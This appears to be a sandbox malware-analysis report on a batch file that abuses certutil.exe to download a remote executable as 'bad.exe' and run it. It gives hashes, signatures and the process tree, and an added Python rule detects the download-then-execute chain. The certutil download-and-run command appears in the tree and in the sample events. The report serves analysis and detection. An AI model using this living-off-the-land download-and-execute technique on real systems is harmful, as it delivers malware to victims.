Analysis
max time kernel: 650s
max time network: 1558s
platform: windows7_x64
resource: win7-20220310-en
submitted: 21-03-2022 16:55
Static task: static1
Behavioral task: behavioral1, Sample: zippyuploader.bat, Resource: win7-20220310-en
Behavioral task: behavioral2, Sample: zippyuploader.bat, Resource: win10-20220223-en
Behavioral task: behavioral3, Sample: zippyuploader.bat, Resource: win10v2004-20220310-en
General
Target: zippyuploader.bat
Size: 107B
MD5: 0fac231074f90878c2283b2561ed906c
SHA1: 2c3421f0a6c20b8c6fb07ffe62526438a5169194
SHA256: acfd8e0557e2efc01d981221e5e5e0fcd68f7231a72d3d46361294d9df43d984
SHA512: fdc5f227244f4e0a76356aba17e38823e0e9bb0ffc344ce07b6bc9282c7192c08a9cbd42d157d13be0c378c9678aec4ea1ea6c7d663d21e732a73a2ceb6159b9
Malware Config
Signatures
Downloads MZ/PE file
Executes dropped EXE (1 IoC)
  pid   process
  1532  bad.exe
Yara rule match: upx (packer rule) on the dropped file
  resource                                    yara_rule
  C:\Users\Admin\AppData\Local\Temp\bad.exe   upx
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   process
  1532  bad.exe
Suspicious use of SetWindowsHookEx (3 IoCs)
  pid   process
  1532  bad.exe  (3 events)
Suspicious use of WriteProcessMemory (7 IoCs)
  description                        pid   process  target process
  PID 2016 wrote to memory of 852    2016  cmd.exe  certutil.exe  (3 events)
  PID 2016 wrote to memory of 1532   2016  cmd.exe  bad.exe       (4 events)
Processes
C:\Windows\system32\cmd.exe (PID 2016)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\zippyuploader.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\certutil.exe (PID 852, child of 2016)
    certutil.exe -urlcache -f https://www.zippyshare.com/zippyuploader/ZippyUploader.exe bad.exe
  C:\Users\Admin\AppData\Local\Temp\bad.exe (PID 1532, child of 2016)
    bad.exe
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
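The process tree shows the whole chain: cmd.exe runs the batch file, certutil.exe (a signed Windows binary) is abused with -urlcache -f to fetch a remote PE and write it to disk as bad.exe, and the same cmd.exe then launches that file. Below is an added detection example that is not part of the sandbox report or its telemetry: it runs over constructed Sysmon Event ID 1 style process-creation records modelled on the tree above (PIDs, images and command lines copied from it, plus one benign certutil invocation as a negative case) and raises one alert for the certutil download and a second, correlated alert when the file certutil wrote is executed by the same parent. The event field names and the -verifyctl -split variant are assumptions, not something the report states.

```python
"""Detect the certutil download-and-execute chain from the process tree above.

Added example; events are constructed, not exported from the sandbox.
"""
import re
from typing import Optional

# Constructed sample events (Sysmon Event ID 1 style, assumed field names).
# PIDs, images and command lines mirror the report's process tree; the last
# record is a benign certutil use the rule must ignore.
EVENTS = [
    {"pid": 2016, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\zippyuploader.bat"'},
    {"pid": 852, "ppid": 2016, "image": r"C:\Windows\system32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f https://www.zippyshare.com/zippyuploader/ZippyUploader.exe bad.exe"},
    {"pid": 1532, "ppid": 2016, "image": r"C:\Users\Admin\AppData\Local\Temp\bad.exe",
     "cmdline": "bad.exe"},
    {"pid": 3000, "ppid": 2900, "image": r"C:\Windows\system32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\server.cer"},
]

_TOKEN = re.compile(r'"[^"]*"|\S+')
# Switch sets that make certutil fetch a URL to disk: the -urlcache -f form
# seen in this report, and the -verifyctl -f -split variant (assumed here).
_DOWNLOAD_SWITCHES = ({"-urlcache", "-f"}, {"-verifyctl", "-f", "-split"})


def basename(path: str) -> str:
    """Last component of a Windows path, quotes stripped, lower-cased."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(cmdline: str) -> list:
    """Split a command line, keeping quoted paths as single tokens."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def certutil_download(event: dict) -> Optional[tuple]:
    """Return (url, output_file) if the event is a certutil download, else None."""
    if basename(event["image"]) != "certutil.exe":
        return None
    toks = tokens(event["cmdline"])
    # certutil accepts both '-' and '/' switch prefixes; normalise to '-'.
    switches = {"-" + t[1:].lower() for t in toks if t.startswith(("-", "/"))}
    if not any(combo <= switches for combo in _DOWNLOAD_SWITCHES):
        return None
    urls = [t for t in toks if re.match(r"(https?|ftp)://", t, re.I)]
    if not urls:
        return None
    url = urls[0]
    # The output file is the first non-switch argument after the URL, if any;
    # without it certutil only populates its URL cache.
    rest = toks[toks.index(url) + 1:]
    outfile = next((t for t in rest if not t.startswith(("-", "/"))), None)
    return url, outfile


def find_chains(events: list) -> list:
    """Flag certutil downloads, then any later run of the file certutil wrote.

    The execution alert requires the same parent PID as the certutil event,
    which is exactly the shape of this report (cmd.exe 2016 spawned both).
    """
    alerts = []
    pending = {}  # lower-cased output basename -> certutil event that wrote it
    for ev in events:
        dl = certutil_download(ev)
        if dl:
            url, outfile = dl
            alerts.append({"rule": "certutil_download", "pid": ev["pid"],
                           "url": url, "outfile": outfile})
            if outfile:
                pending[basename(outfile)] = ev
            continue
        dropper = pending.get(basename(ev["image"]))
        if dropper and ev["ppid"] == dropper["ppid"]:
            alerts.append({"rule": "download_then_execute", "pid": ev["pid"],
                           "downloaded_by": dropper["pid"], "parent": ev["ppid"]})
    return alerts


if __name__ == "__main__":
    for alert in find_chains(EVENTS):
        print(alert)
```

The first rule on its own is already a strong signal on most fleets, since certutil fetching URLs is rare outside of certificate enrollment tooling; the correlation step ties the download to the execution so the alert carries the full chain rather than two unrelated events. The same-parent requirement is a precision choice and can be relaxed to match on basename alone where the script interpreter is not expected to launch the payload itself.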
Downloads
MD5: ed323324bff4fbe54be6040ef429862c
SHA1: 2182d6953bc33050d44ca585ca3e6e64cd0a6864
SHA256: 88184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442
SHA512: 72511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b